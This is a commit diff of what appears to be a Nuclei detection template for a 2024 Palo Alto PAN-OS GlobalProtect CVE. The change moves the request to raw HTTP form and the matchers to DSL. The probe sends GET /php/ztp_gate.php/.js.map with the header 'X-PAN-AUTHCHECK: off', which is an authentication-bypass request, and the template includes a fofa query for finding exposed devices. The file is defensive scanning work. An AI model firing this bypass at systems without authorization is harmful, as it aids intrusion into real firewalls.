added dsl & updated req type
parent
83a4e8f59b
commit
f1d108b593
|
@ -19,6 +19,8 @@ info:
|
||||||
epss-percentile: 0.85843
|
epss-percentile: 0.85843
|
||||||
cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
||||||
metadata:
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 1
|
||||||
vendor: paloaltonetworks
|
vendor: paloaltonetworks
|
||||||
product: pan-os
|
product: pan-os
|
||||||
fofa-query: icon_hash="-631559155"
|
fofa-query: icon_hash="-631559155"
|
||||||
|
@ -28,29 +30,17 @@ info:
|
||||||
tags: cve,cve2024,paloalto,globalprotect,kev
|
tags: cve,cve2024,paloalto,globalprotect,kev
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/php/ztp_gate.php/.js.map"
|
GET /php/ztp_gate.php/.js.map HTTP/1.1
|
||||||
headers:
|
Host: {{Hostname}}
|
||||||
X-PAN-AUTHCHECK: off
|
X-PAN-AUTHCHECK: off
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: dsl
|
||||||
words:
|
dsl:
|
||||||
- "<title>Zero Touch Provisioning</title>"
|
- 'contains_any(body, "<title>Zero Touch Provisioning", "Zero Touch Provisioning (ZTP)")'
|
||||||
- "Zero Touch Provisioning (ZTP)"
|
- 'contains(body, "/scripts/cache/mainui.javascript")'
|
||||||
|
- 'contains(header, "PHPSESSID=")'
|
||||||
- type: word
|
- 'status_code == 200'
|
||||||
part: body
|
condition: and
|
||||||
words:
|
|
||||||
- "/scripts/cache/mainui.javascript"
|
|
||||||
|
|
||||||
- type: word
|
|
||||||
part: header
|
|
||||||
words:
|
|
||||||
- "PHPSESSID="
|
|
||||||
|
|
||||||
- type: status
|
|
||||||
status:
|
|
||||||
- 200
|
|
||||||
|
|
Loading…
Reference in New Issue